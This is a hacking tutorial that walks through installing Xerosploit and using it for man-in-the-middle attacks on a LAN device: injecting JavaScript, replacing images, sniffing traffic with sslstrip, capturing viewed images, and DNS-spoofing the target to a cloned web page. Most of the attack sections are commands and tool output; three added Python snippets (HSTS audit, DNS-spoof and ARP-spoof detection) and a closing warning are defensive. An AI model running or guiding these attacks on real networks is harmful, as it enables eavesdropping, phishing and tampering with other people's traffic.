
Performing Advanced Man-in-the-Middle Attacks with Xerosploit « Null Byte :: WonderHowTo



A man-in-the-middle attack, or MitM attack, is when a hacker penetrates a network and forces all nearby devices to connect directly to their machine. This allows them to spy on traffic and even tweak certain things. Bettercap is a tool that can be used for these kinds of MitM attacks, but Xerosploit can automate high-level features that would normally require more configuration work in Bettercap.

Xerosploit works on top of a few other tools, namely Bettercap and Nmap, and automates them to the extent that you can reach these higher-level concepts in just a few commands.

However, Xerosploit can be hit or miss, so don't be surprised if some web pages can't be spoofed because the target uses HTTPS or routes traffic through a VPN. Since 73% of all websites use HTTPS, you will only have success manipulating web pages on the remaining 27%, and only if no VPN is used.

Some sites are still accessible over HTTP because they don’t redirect insecure requests to HTTPS, and some don’t even have secure versions yet. Here’s a small sample, but there are many more in that 27%:
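The two paragraphs above describe the condition that makes a page tamperable in transit: the site answers over plain HTTP at all. Whether a site falls into that 27% is something its owner can audit from the response headers alone. The following is an added example (not code from the article or from Xerosploit) that classifies a site's exposure from its HTTP and HTTPS responses; the hostnames and responses are constructed samples, and the three verdict labels are the example's own.

```python
# Added example, not from the original article: audit whether a site's plain-HTTP
# entry point leaves room for in-transit tampering. The responses below are
# constructed samples with placeholder hostnames, not captured from real sites.
from dataclasses import dataclass, field
from typing import Dict, Optional


@dataclass
class HttpResponse:
    status: int
    headers: Dict[str, str] = field(default_factory=dict)  # lower-case header names

    def get(self, name: str) -> Optional[str]:
        return self.headers.get(name.lower())


def hsts_max_age(value: str) -> Optional[int]:
    """Return the max-age directive of a Strict-Transport-Security header, or None."""
    for directive in value.split(";"):
        name, _, number = directive.strip().partition("=")
        if name.strip().lower() == "max-age":
            try:
                return int(number.strip().strip('"'))
            except ValueError:
                return None
    return None


def classify(http_resp: HttpResponse, https_resp: Optional[HttpResponse]) -> str:
    """Classify the exposure of http://host/ given the HTTP and HTTPS responses.

    'plaintext'     content is served over HTTP: every byte can be altered in transit
    'redirect-only' HTTP redirects to HTTPS, but the first request is still sent in clear
    'hsts'          redirect plus HSTS over HTTPS: a browser that has seen the site
                    rewrites http:// to https:// locally and never sends the plain request
    """
    location = (http_resp.get("location") or "").lower()
    redirects = 300 <= http_resp.status < 400 and location.startswith("https://")
    if not redirects:
        return "plaintext"
    # RFC 6797: browsers ignore Strict-Transport-Security received over plain HTTP,
    # so only the header on the HTTPS response counts.
    hsts = https_resp.get("strict-transport-security") if https_resp else None
    if hsts and (hsts_max_age(hsts) or 0) > 0:
        return "hsts"
    return "redirect-only"


# Constructed sample responses (placeholder hostnames).
SAMPLE_SITES = {
    "legacy.example": (HttpResponse(200, {"content-type": "text/html"}), None),
    "redirect.example": (
        HttpResponse(301, {"location": "https://redirect.example/"}),
        HttpResponse(200, {"content-type": "text/html"}),
    ),
    "hardened.example": (
        HttpResponse(301, {"location": "https://hardened.example/"}),
        HttpResponse(200, {"strict-transport-security": "max-age=31536000; includeSubDomains"}),
    ),
    # HSTS sent on the HTTP response itself, with no redirect: browsers ignore it.
    "misconfigured.example": (
        HttpResponse(200, {"strict-transport-security": "max-age=31536000"}),
        HttpResponse(200, {}),
    ),
}


def audit(sites) -> Dict[str, str]:
    """Map each hostname to its exposure verdict."""
    return {host: classify(http_resp, https_resp) for host, (http_resp, https_resp) in sites.items()}


if __name__ == "__main__":
    for host, verdict in audit(SAMPLE_SITES).items():
        print(f"{host:24} {verdict}")
```

The 'hsts' verdict is the one that matters against the downgrade tricks used later in the article: once a browser has cached the HSTS policy, it never issues the plain-HTTP request that a man in the middle could rewrite. A redirect alone still leaves that first request exposed.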

What is needed?

We’ve only tested Xerosploit on Ubuntu and Kali Linux, but it may work on macOS as well. However, you can only choose between “Ubuntu / Kali Linux / Others” and “Parrot OS” during the installation process.

You also need the latest version of Python installed on your computer.

Step 1: Install Xerosploit

First install Xerosploit from GitHub using git clone.

~$ git clone https://github.com/LionSec/xerosploit

Cloning into 'xerosploit' ...
remote: Enumerating objects: 306, done.
remote: Total 306 (delta 0), reused 0 (delta 0), pack-reused 306
Receiving objects: 100% (306/306), 793.28 KiB | 2.38 MiB/s, done.
Resolving deltas: 100% (68/68), done.

Then change into the directory (cd) and start the installer with Python. It will ask you to select your operating system; if you use Kali Linux, choose 1 and press Enter.

~$ cd xerosploit && sudo python install.py

┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                     Xerosploit Installer                     █
█                                                              █
└══════════════════════════════════════════════════════════════┘

[++] Please choose your operating system.

1) Ubuntu / Kali Linux / Others
2) Parrot OS

>>> 1

[++] Insatlling Xerosploit ...
Get:1 http://kali.download/kali kali-rolling inRelease [30.5 kB]
Get:2 http://kali.download/kali kali-rolling/main Sources [14.0 kB]

...

Xerosploit has been successfully installed. Execute 'xerosploit' in your termninal.

Step 2: Install the Dependencies

For Xerosploit to do its job properly, you need all the tools it built its service on, including Nmap, hping3, build-essential, ruby-dev, libpcap-dev, and libgmp3-dev. If you use Kali, you probably already have all of these.

~/xerosploit$ sudo apt install nmap hping3 build-essential ruby-dev libpcap-dev libgmp3-dev

Reading package lists ... Done
Building dependency try ... Done
Reading state information ... Done
build-essential is already the newest version (12.9).
build-essential set to manually installed.
hping3 is already the newest version (3.a2.ds2-10).
hping3 set to manually installed.
nmap is already the newest version (7.91+dfsg1-1kali1).
nmap set to manually installed.
ruby-dev is already the newest version (1:2.7+2).
ruby-dev set to manually installed.
libpcap-dev is already the newest version (1.9.1-r0).
libpcap-dev set to manually installed.
libgmp3-dev is already the newest version (2:6.0.0+dfsg-6).
libgmp3-dev set to manually installed.

Then use pip to install tabulate and terminaltables, which allow Xerosploit to display information in an easy-to-read way. You probably already have these.

~/xerosploit$ sudo pip3 install tabulate terminaltables

Requirement already satisfied: tabulate in /usr/lib/python3/dist-packages (0.8.7)
Requirement already satisfied: terminaltables in /usr/lib/python3/dist-packages (3.1.0)

Step 3: View Xerosploit’s Commands

Start Xerosploit with the xerosploit command. It immediately shows information about your network configuration.

~/xerosploit$ sudo xerosploit

        ▄  ▄███▄   █▄▄▄▄ ████▄    ▄▄▄▄▄   █ ▄▄  █     ████▄ ▄█    ▄▄▄▄▀
    ▀▄   █ █▀   ▀  █  ▄▀ █   █   █     ▀▄ █   █ █     █   █ ██ ▀▀▀ █
      █ ▀  ██▄▄    █▀▀▌  █   █ ▄  ▀▀▀▀▄   █▀▀▀  █     █   █ ██     █
     ▄ █   █▄   ▄▀ █  █  ▀████  ▀▄▄▄▄▀    █     ███▄  ▀████ ▐█    █
    █   ▀▄ ▀███▀     █                     █        ▀        ▐   ▀
     ▀              ▀                       ▀

[+]═══════════[ Author : @LionSec1 _-|/-_ Website: www.neodrix.com ]═══════════[+]

                      [ Powered by Bettercap and Nmap ]

┌═════════════════════════════════════════════════════════════════════════════┐
█                                                                             █
█                         Your Network Configuration                          █
█                                                                             █
└═════════════════════════════════════════════════════════════════════════════┘

╒════════════════════════════════════════════════════════════════════════════╤═══════════════════╤═════════════╤═════════╤═════════════╕
│                                 IP Address                                 │    MAC Address    │   Gateway   │  Iface  │  Hostname   │
╞════════════════════════════════════════════════════════════════════════════╪═══════════════════╪═════════════╪═════════╪═════════════╡
├────────────────────────────────────────────────────────────────────────────┼───────────────────┼─────────────┼─────────┼─────────────┤
│ 192.168.8.172 fd0b:ed07:cb03:10::3fa fd0b:ed07:cb03:10:dcf1:e71a:2dc3:299f │ 28:D2:44:23:54:2B │ 192.168.8.1 │  eth0   │ Macbook-Pro │
╘════════════════════════════════════════════════════════════════════════════╧═══════════════════╧═════════════╧═════════╧═════════════╛

╔═════════════╦════════════════════════════════════════════════════════════════════╗
║             ║ Xerosploit is a penetration testing toolkit whose goal is to       ║
║ Information ║ perform man in the middle attacks for testing purposes.            ║
║             ║ It brings various modules that allow to realise efficient attacks. ║
║             ║ This tool is Powered by Bettercap and Nmap.                        ║
╚═════════════╩════════════════════════════════════════════════════════════════════╝

[+] Please type 'help' to view commands.

Xero ➮

Type help to see all available commands in Xerosploit.

Xero ➮ help

╔══════════╦════════════════════════════════════════════════════════════════╗
║          ║                                                                ║
║          ║ scan : Map your network.                                       ║
║          ║                                                                ║
║          ║ iface : Manually set your network interface.                   ║
║ COMMANDS ║                                                                ║
║          ║ gateway : Manually set your gateway.                           ║
║          ║                                                                ║
║          ║ start : Skip scan and directly set your target IP address.     ║
║          ║                                                                ║
║          ║ rmlog : Delete all xerosploit logs.                            ║
║          ║                                                                ║
║          ║ help : Display this help message.                              ║
║          ║                                                                ║
║          ║ exit : Close Xerosploit.                                       ║
║          ║                                                                ║
╚══════════╩════════════════════════════════════════════════════════════════╝

[+] Please type 'help' to view commands.

Xero ➮

Step 4: Run a scan to identify targets

First, we'll do some reconnaissance to identify a target with the scan command, which runs on top of Nmap.

Xero ➮ scan

[++} Mapping your network ...

[+]═══════════[ Devices found on your network ]═══════════[+]

╔═══════════════╦═══════════════════╦═══════════════════════════════╗
║ IP Address    ║ Mac Address       ║ Manufacturer                  ║
║═══════════════║═══════════════════║═══════════════════════════════║
║ 192.168.8.1   ║ 94:83:C4:00:EB:C5 ║ (Unknown)                     ║
║ 192.168.8.215 ║ B8:70:F4:AD:44:C8 ║ (Compal Information(kunshan)) ║
║ 192.168.8.172 ║ 28:D2:44:12:23:6B ║ (This device)                 ║
╚═══════════════╩═══════════════════╩═══════════════════════════════╝

[+] Please choose a target (e.g. 192.168.1.10). Enter 'help' for more information.

Xero ➮

You should see a list of IP addresses, and if all went well, one of them is the device you want to target. Type that IP address. For me, it's the "kunshan" device.

Xero ➮ 192.168.8.215

[++] 192.168.8.215 ha been targeted.

[+] Which module do you want to load ? Enter 'help' for more information.

Xero»modules ➮

Now it will ask which module you want to run against the target. If you don't know which module you want, type help to see the full list.

Xero»modules ➮ help

╔═════════╦════════════════════════════════════════════════════════════════════╗
║         ║                                                                    ║
║         ║ pscan      : Port Scanner                                          ║
║         ║                                                                    ║
║         ║ dos        : DoS Attack                                            ║
║         ║                                                                    ║
║         ║ ping       : Ping Request                                          ║
║         ║                                                                    ║
║         ║ injecthtml : Inject Html code                                      ║
║         ║                                                                    ║
║         ║ injectjs   : Inject Javascript code                                ║
║         ║                                                                    ║
║         ║ rdownload  : Replace files being downloaded                        ║
║         ║                                                                    ║
║         ║ sniff      : Capturing information inside network packets          ║
║ MODULES ║                                                                    ║
║         ║ dspoof     : Redirect all the http traffic to the specified one IP ║
║         ║                                                                    ║
║         ║ yplay      : Play background sound in target browser               ║
║         ║                                                                    ║
║         ║ replace    : Replace all web pages images with your own one        ║
║         ║                                                                    ║
║         ║ driftnet   : View all images requested by your targets             ║
║         ║                                                                    ║
║         ║ move       : Shaking Web Browser content                           ║
║         ║                                                                    ║
║         ║ deface     : Overwrite all web pages with your HTML code           ║
║         ║                                                                    ║
╚═════════╩════════════════════════════════════════════════════════════════════╝

[+] Which module do you want to load ? Enter 'help' for more information.

Xero»modules ➮

Step 5: Shake the target’s web browser

Of all the modules, the simplest to run is move, which shakes the content of the web browser on the target computer. This helps verify that we have access to the target, or at least that we can manipulate its connection.

Xero»modules ➮ move

┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                           Shakescreen                        █
█                                                              █
█                   Shaking Web Browser content                █
└══════════════════════════════════════════════════════════════┘

[+] Enter 'run' to execute the 'move' command.

Xero»modules»shakescreen ➮

To start the Shakescreen effect, use run, which starts injecting JavaScript code into the browser when the target visits a website. But remember that it only works on web pages that use HTTP and not HTTPS.

Xero»modules»shakescreen ➮ run

[++] Injecting shakescreen.js  ...

[++] Press 'Ctrl + C' to stop.

So as soon as they open an HTTP web page, the page should start to vibrate uncontrollably. At first, the target might think something is wrong with their display, until they notice that the browser window itself and everything behind it don't vibrate. Then they might think their internet connection is having problems.

This will continue to happen on every HTTP webpage they visit until you stop the attack with Control-C in the terminal.

stop
^C
Stopping MITM attack  ...

[+] Enter 'run' to execute the 'move' command.

Xero»modules»shakescreen ➮

Step 6: Replace all images in the target browser

Now let's test another module. To return to the module selection screen, type back and press Enter.

Xero»modules»shakescreen ➮ back

[+] Which module do you want to load ? Enter 'help' for more information.

Xero»modules ➮

Xerosploit has a module called replace, which swaps all images loaded on an HTTP-based web page with any image we want.

Xero»modules ➮ replace

┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                          Image Replace                       █
█                                                              █
█        Replace all web pages images with your own one        █
└══════════════════════════════════════════════════════════════┘

[+] Enter 'run' to execute the 'replace' command.

Xero»modules»replace ➮

To start the Replace Image tool, type run, and it will immediately prompt you to add the path of the image.

Xero»modules»replace ➮ run

[+] Insert your image path. (e.g. /home/capitansalami/pictures/fun.png)

Xero»modules»replace ➮

Find an image on your computer, then type its path or drag the image into the terminal window to autofill it. Press Enter to start the attack.

Xero»modules»replace ➮ /root/Desktop/Bolton/index_files/JBolton_Walrus.jpg

[++] All images will be replaced by /root/Desktop/Bolton/index_files/JBolton_Walrus.jpg

[++] Press 'Ctrl + C' to stop .

Whenever an HTTP-based web page loads in the target browser, all the images are replaced with the one image we chose. It doesn’t always work 100%, so a few images may slip by unchanged, and it can be a little slow depending on the connection speed, but overall it works pretty well.

This will continue to happen on every HTTP page until you stop the attack.

^C
Stopping MITM attack  ...

[+] Enter 'run' to execute the 'replace' command.

Xero»modules»replace ➮

Step 7: Capture data over the network

Let's try another module. To return to the module selection screen, type back and press Enter.

Xero»modules»replace ➮ back

[+] Which module do you want to load ? Enter 'help' for more information.

Xero»modules ➮

With the sniff module, we can capture some general data through the network.

Xero»modules ➮ sniff

┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                           Sniffing                           █
█                                                              █
█      Capturing any data passed over your local network       █
└══════════════════════════════════════════════════════════════┘

[+] Please type 'run' to execute the 'sniff' command.

Xero»modules»sniff ➮

Once the Sniffing module is selected, type run to start sniffing. It then asks whether you want to load sslstrip, which tries to downgrade HTTPS connections to plain HTTP so that information that would otherwise be encrypted can be captured.

Xero»modules»sniff ➮ run

[+] Do you want to load sslstrip ? (y/n).

Xero»modules»sniff ➮ y

[++] All logs are saved on : /opt/xerosploit/xerosniff

[++] Sniffing on 192.168.8.215

[++] sslstrip : ON

[++] Press 'Ctrl + C' to stop .

A new window should open listing all packets that are intercepted and stored on your computer. In it, you can see which websites the target visits and which data is requested and sent.

Once you're done sniffing packets, stop the attack with Control-C. You will then be asked whether you want to save the logs: y for yes, n for no.

^C
Stopping MITM attack  ...

[+] Do you want to save logs ? (y/n).

Xero»modules»sniff ➮ n

[++] Logs have been removed.

[+] Please type 'run' to execute the 'sniff' command.

Xero»modules»sniff ➮

Step 8: View all images loaded in the target browser

Let's try another module. To return to the module selection screen, type back and press Enter.

Xero»modules»sniff ➮ back

[+] Which module do you want to load ? Enter 'help' for more information.

Xero»modules ➮

Load driftnet, a module that lets you view each image requested by the target's browser, and then run it. It logs all images seen on HTTP web pages in the target browser and saves them in the /opt/xerosploit/xedriftnet directory.

Xero»modules ➮ driftnet

┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                            Driftnet                          █
█                                                              █
█          View all images requested by your target            █
└══════════════════════════════════════════════════════════════┘

[+] Enter 'run' to execute the 'driftnet' command.

Xero»modules»driftnet ➮ run

[++] Capturing requested images on 192.168.8.215  ...

[++] All captured images will be temporarily saved in /opt/xerosploit/xedriftnet

[++] Press 'Ctrl + C' to stop.

When you're ready to check out the captured images, open a separate terminal window and navigate to the xedriftnet folder. List its contents with ls to see what has been captured.

~$ cd /opt/xerosploit/xedriftnet

~/opt/xerosploit/xedriftnet$ ls

Step 9: Run the DNS Spoofing Module on a Target

If you want to redirect traffic to a specific IP address, the dspoof module can help. But first you need a fake website to redirect others on the network to, so visit a website you want to copy, save the HTML file, and rename it index.html.

Then open a separate terminal window and navigate to the folder containing index.html. Run the following command to serve a local copy of the web page, replacing YOUR_IP with your machine's IP address.

~$ sudo python3 -m http.server --bind YOUR_IP 80

Then return to the terminal window with Xerosploit. Go back to the module selection screen, load dspoof, and run it.

When prompted, enter your IP address as the address to which traffic should be redirected. Every HTTP web page the target loads will then show the page you cloned.

Xero»modules»sniff ➮ back

[+] Which module do you want to load ? Enter 'help' for more information.

Xero»modules ➮ dspoof

┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                         DNS spoofing                         █
█                                                              █
█   Supply false DNS information to all target browsed hosts   █
█     Redirect all the http traffic to the specified one IP    █
└══════════════════════════════════════════════════════════════┘

[+] Please type 'run' to execute the 'dspoof' command.

Xero»modules»dspoof ➮ run

[+] Enter the IP address where you want to redirect the traffic.

[++] Redirecting all the traffic to your IP address.

[++] Press 'Ctrl + C' to stop .
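From the target's side, the dspoof step above has a distinctive footprint: unrelated public hostnames suddenly all resolve to one machine on the local network. The following is an added example (not code from the article or from Xerosploit) that scores a batch of resolver answers for that footprint. The answers are constructed; the hostnames are placeholders, and the redirect address reuses the Xerosploit host from the article's lab network (192.168.8.172).

```python
# Added example, not from the original article: indicators that the local resolver is
# handing out forged answers that point public names at one LAN host. Answers below
# are constructed samples with placeholder hostnames.
import ipaddress
from collections import defaultdict
from typing import Dict, List

# Address space that a public hostname should never resolve into.
LAN_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
# Names that legitimately live on the LAN (local printers, NAS, and so on).
LOCAL_SUFFIXES = (".local", ".lan", ".home", ".internal")


def is_lan_address(ip: str) -> bool:
    """True for RFC 1918, loopback and link-local IPv4 addresses."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in LAN_NETS)


def dns_spoof_indicators(answers: Dict[str, List[str]], shared_threshold: int = 3) -> Dict[str, List[str]]:
    """answers maps each queried name to the A-record addresses the resolver returned."""
    lan_hits = []
    names_by_ip = defaultdict(set)
    for name, ips in answers.items():
        for ip in ips:
            names_by_ip[ip].add(name)
            if not name.endswith(LOCAL_SUFFIXES) and is_lan_address(ip):
                lan_hits.append(f"{name} -> {ip}")
    # Many names on one address is normal for CDNs; it is only reported as context.
    shared = [f"{ip} answers for {len(names)} names: {', '.join(sorted(names))}"
              for ip, names in names_by_ip.items() if len(names) >= shared_threshold]
    return {"lan_answers": sorted(lan_hits), "shared_answers": shared}


def looks_spoofed(answers: Dict[str, List[str]], shared_threshold: int = 3) -> bool:
    """Verdict: a public name answered with a LAN address is the decisive sign."""
    return bool(dns_spoof_indicators(answers, shared_threshold)["lan_answers"])


# Constructed resolver output. 203.0.113.0/24 and 198.51.100.0/24 are documentation
# ranges standing in for real public addresses.
CLEAN_ANSWERS = {
    "news.example": ["203.0.113.10"],
    "shop.example": ["198.51.100.7"],
    "mail.example": ["203.0.113.10"],
    "printer.lan": ["192.168.8.9"],
}
SPOOFED_ANSWERS = {
    "news.example": ["192.168.8.172"],
    "shop.example": ["192.168.8.172"],
    "mail.example": ["192.168.8.172"],
    "printer.lan": ["192.168.8.9"],
}

if __name__ == "__main__":
    for label, answers in (("clean", CLEAN_ANSWERS), ("spoofed", SPOOFED_ANSWERS)):
        print(label, looks_spoofed(answers), dns_spoof_indicators(answers))
```

A host can feed this from its own resolver lookups for a fixed list of well-known names; a LAN address in the answer for any of them is enough to stop and check the gateway before typing credentials into the page that loads.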

Step 10: Try out the other modules

The other modules you can try are the following; some of them are quite fun.

  • yplay: Play a YouTube video in the background of browsers.
  • injectjs: Inject JavaScript into websites loaded by others on the network.
  • injecthtml: Inject HTML into websites loaded on the network instead.
  • dos: Deny internet access to that IP address.
  • pscan: Perform a port scan.
  • ping: Ping a device.
  • rdownload: Replace files being downloaded with your own files.
  • deface: Swap any web page with your own HTML.

Xerosploit is a vivid example of why you should be careful connecting to an unknown network. While a VPN can protect you in most cases, there are still ways an attacker can manipulate your traffic. So be sure to take as many precautions as possible, such as using a VPN, if you are unsure of the security of the network you will be connecting to.
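The precaution the article leaves out is noticing the attack from the target's side. The traffic steering behind every module here comes from Bettercap, whose man-in-the-middle mode works by ARP spoofing (an assumption about the mechanism; the article only says it is "powered by Bettercap"), so on the victim the gateway's entry in the neighbour table suddenly carries the attacker's hardware address. The following is an added example (not code from the article or from Xerosploit) that parses successive `ip neigh show` snapshots and reports that change; the snapshots are constructed, reusing the gateway and Xerosploit-host addresses from the article's lab network.

```python
# Added example, not from the original article: a check a LAN device can run on its own
# neighbour table to notice that the gateway is being impersonated. Input is
# `ip neigh show` output; the snapshots are constructed from the article's lab addresses.
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

NEIGH_RE = re.compile(
    r"^(?P<ip>\S+)\s+dev\s+(?P<dev>\S+)\s+lladdr\s+(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})", re.I)


def parse_neigh(text: str) -> Dict[str, str]:
    """Parse `ip neigh show` lines into {ip: mac}; entries without lladdr (FAILED) are skipped."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m["ip"]] = m["mac"].lower()
    return table


def check_snapshot(table: Dict[str, str], gateway_ip: str, pinned_gateway_mac: Optional[str]) -> List[str]:
    """Compare one snapshot against the pinned gateway MAC and look for shared hardware addresses."""
    alerts = []
    gw_mac = table.get(gateway_ip)
    if pinned_gateway_mac and gw_mac and gw_mac != pinned_gateway_mac:
        alerts.append(f"gateway {gateway_ip} now maps to {gw_mac}, expected {pinned_gateway_mac}")
    # One hardware address answering for several IPs is the classic spoofing footprint:
    # the impersonator keeps its own address while also claiming the gateway's. Routers
    # with several addresses on one interface produce the same pattern, so treat it as a lead.
    ips_by_mac = defaultdict(list)
    for ip, mac in table.items():
        ips_by_mac[mac].append(ip)
    for mac, ips in ips_by_mac.items():
        if len(ips) > 1:
            alerts.append(f"{mac} claims {len(ips)} addresses: {', '.join(sorted(ips))}")
    return alerts


def monitor(snapshots: List[str], gateway_ip: str) -> List[Tuple[int, str]]:
    """Pin the gateway MAC from the first snapshot, then report deviations in later ones."""
    pinned = None
    findings = []
    for index, text in enumerate(snapshots):
        table = parse_neigh(text)
        if pinned is None:
            pinned = table.get(gateway_ip)
        for alert in check_snapshot(table, gateway_ip, pinned):
            findings.append((index, alert))
    return findings


# Constructed snapshots as seen from the target (192.168.8.215): before and after
# the Xerosploit host (192.168.8.172) starts answering for the gateway (192.168.8.1).
SNAPSHOTS = [
    "192.168.8.1 dev wlan0 lladdr 94:83:c4:00:eb:c5 REACHABLE\n"
    "192.168.8.172 dev wlan0 lladdr 28:d2:44:12:23:6b STALE\n",
    "192.168.8.1 dev wlan0 lladdr 28:d2:44:12:23:6b REACHABLE\n"
    "192.168.8.172 dev wlan0 lladdr 28:d2:44:12:23:6b REACHABLE\n"
    "192.168.8.50 dev wlan0  FAILED\n",
]

if __name__ == "__main__":
    for index, alert in monitor(SNAPSHOTS, "192.168.8.1"):
        print(f"snapshot {index}: {alert}")
```

Run in a loop over real `ip neigh show` output, the first finding fires within one poll interval of the attack starting. Pinning the gateway with a static neighbour entry (ip neigh replace with nud permanent) stops the poisoned reply from being accepted in the first place, at the cost of having to update the entry if the router is replaced.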


Cover image and GIFs by Retia/Null Byte
